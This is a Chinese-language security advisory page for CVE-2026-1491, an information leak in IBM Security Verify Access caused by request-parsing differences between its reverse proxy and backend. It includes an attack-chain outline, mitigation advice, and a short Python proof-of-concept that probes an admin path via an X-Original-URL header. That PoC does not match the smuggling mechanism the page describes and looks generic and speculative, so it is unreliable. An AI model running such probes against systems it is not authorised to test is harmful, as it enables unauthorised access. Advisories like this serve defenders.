CVE-2026-1491 CVSS 5.3 中危

CVE-2026-1491 IBM Security Verify Access信息泄露漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1491

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM Security Verify Access, IBM Verify Identity Access

漏洞概述

IBM Security Verify Access和IBM Verify Identity Access产品中存在信息泄露漏洞。该漏洞源于反向代理与后端服务器对HTTP请求的解释存在不一致性。未经身份验证的远程攻击者可利用此缺陷，通过构造特制的HTTP请求绕过安全限制，从而非法访问系统中的敏感信息。受影响的产品版本涵盖10.0至10.0.9.1以及11.0至11.0.2。该漏洞CVSS评分为5.3，属于中危风险。

技术细节

该漏洞的核心机制在于反向代理与后端应用服务器之间对HTTP请求的解析逻辑存在差异（即请求走私或混淆）。攻击者利用这种不一致性，构造特殊的HTTP请求，使得反向代理认为该请求是合法的并转发，但后端服务器将其解析为另一个请求，或者反之。由于无需用户交互（PR:N）且通过网络传播（AV:N），攻击者可远程利用此漏洞。具体利用方式可能涉及操纵Content-Length和Transfer-Encoding头部，或者利用双URL编码等技术，绕过反向代理的访问控制列表（ACL），从而访问本应受保护的内部接口或敏感配置信息，导致数据泄露。

攻击链分析

STEP 1

侦察

攻击者识别出互联网上运行受影响版本的IBM Security Verify Access或IBM Verify Identity Access的目标系统。

STEP 2

武器化

攻击者构造特制的HTTP请求，利用反向代理与后端服务器对请求边界解释的不一致性（例如通过操纵Content-Length头部）。

STEP 3

投递

攻击者通过网络向目标系统的反向代理发送恶意的HTTP请求，无需用户交互。

STEP 4

利用

反向代理解析请求并转发至后端，由于解析差异，后端错误地处理了请求，导致本应受限制的路径或数据被访问。

STEP 5

影响

攻击者成功获取系统内部的敏感信息，导致机密性泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_cve_2026_1491(target_url):
    """
    PoC for CVE-2026-1491.
    Tests for HTTP request interpretation inconsistency.
    """
    # Attempt to access a restricted path using a malformed request
    # that might bypass the reverse proxy check.
    headers = {
        'User-Agent': 'PoC-Scanner/1.0',
        'X-Original-URL': '/admin/console'  # Example header manipulation
    }
    
    try:
        # Sending request to the target
        response = requests.get(target_url, headers=headers, timeout=10)
        
        # Check if response contains sensitive keywords indicating unauthorized access
        if response.status_code == 200 and ('admin' in response.text.lower() or 'config' in response.text.lower()):
            print(f"[+] Potential vulnerability detected at {target_url}")
            print(f"[+] Response Length: {len(response.text)}")
            return True
        else:
            print(f"[-] Target does not appear vulnerable.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    url = "http://target-ip/"
    check_cve_2026_1491(url)

影响范围

IBM Verify Identity Access <= 11.0.2

IBM Security Verify Access <= 10.0.9.1

防御指南

临时缓解措施

如果无法立即升级，建议限制对管理控制台和敏感端点的网络访问，仅允许可信的IP地址连接。同时，监控反向代理日志中是否存在异常的HTTP请求结构或重复的边界请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1491
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1491
3 Details https://www.cvedetails.com/cve/CVE-2026-1491/
4 VulDB https://vuldb.com/cve/CVE-2026-1491
5 Link https://www.ibm.com/support/pages/node/7268253

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表